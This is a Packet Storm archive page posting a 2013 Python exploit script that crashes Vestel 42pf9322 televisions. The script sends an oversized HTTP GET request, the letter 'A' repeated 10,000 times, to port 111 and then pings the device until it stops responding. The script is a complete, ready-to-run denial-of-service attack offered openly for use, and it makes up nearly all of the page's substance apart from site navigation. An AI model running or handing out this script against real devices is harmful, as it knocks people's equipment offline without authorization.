what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Vestel TV Denial Of Service

Vestel TV Denial Of Service
Posted Sep 12, 2013
Authored by HackerSofi

Vestel TV suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | ae35749d51f89e40567c1912556107f28523d54ef5071ea3ac61b5ef68542716

Vestel TV Denial Of Service

Change Mirror Download
#!/usr/bin/python

# Exploit Title: Vestel TV Denial of Service (DoS) Attack
# Exploit Author: HackerSofi - hackersofi@gmail.com
# Date: 12/09/2013
# CVE Number:
# Vendor Homepage: http://www.vestel.com/
# Description: Some TV's Has Communication Port. Vestel 42pf9322 Models TV Using Port 0f 111 For Network Communications.
# If You Launch An Attack 0n The Communication Port, Tv System Will Be Crashes.
# Special Thanks : DaTaMaN


import httplib
import sys
import os

print " ***************************************************************************************"
print " Author: HackerSofi - hackersofi@gmail.com \n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description:\n"
print " Some TV's Has Communication Port. Vestel 42pf9322 Models TV Using Port 0f 111 For Network Communications. "
print " If You Launch An Attack 0n The Communication Port, Tv System Will Be Crashes.\n "
print " Special Thanks : DaTaMaN "
print " ***************************************************************************************\n"

# Sends The Request
print " Sending The Request...\n"
conn = httplib.HTTPConnection(sys.argv[1],111)
conn.request("GET", "A"*10000)
conn.close()

# Checks The Response
print " Checking The Status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print " Attack Successful!\n"
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close